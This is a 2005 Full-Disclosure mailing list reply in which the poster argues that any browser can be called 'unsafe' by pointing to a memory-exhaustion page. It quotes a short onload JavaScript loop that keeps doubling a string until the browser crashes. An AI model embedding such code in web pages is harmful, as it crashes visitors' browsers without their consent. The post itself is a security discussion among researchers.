Re: [Full-disclosure] PDF's unsafe?
- To: "Geo." <geoincidents@xxxxxxx>
- Subject: Re: [Full-disclosure] PDF's unsafe?
- From: Bipin Gautam <gautam.bipin@xxxxxxxxx>
- Date: Thu, 22 Sep 2005 15:37:51 +0545
On 9/21/05, Geo. <geoincidents@xxxxxxx> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....
http://bipin.sosvulnerable.net/temp/fdrd.html
& probably your OS will close the browser after it runs out of memory.
Or maybe try this:
/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
SO IE/mozilla is unsafe?
Bipin Gautam
http://bipin.tk
Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/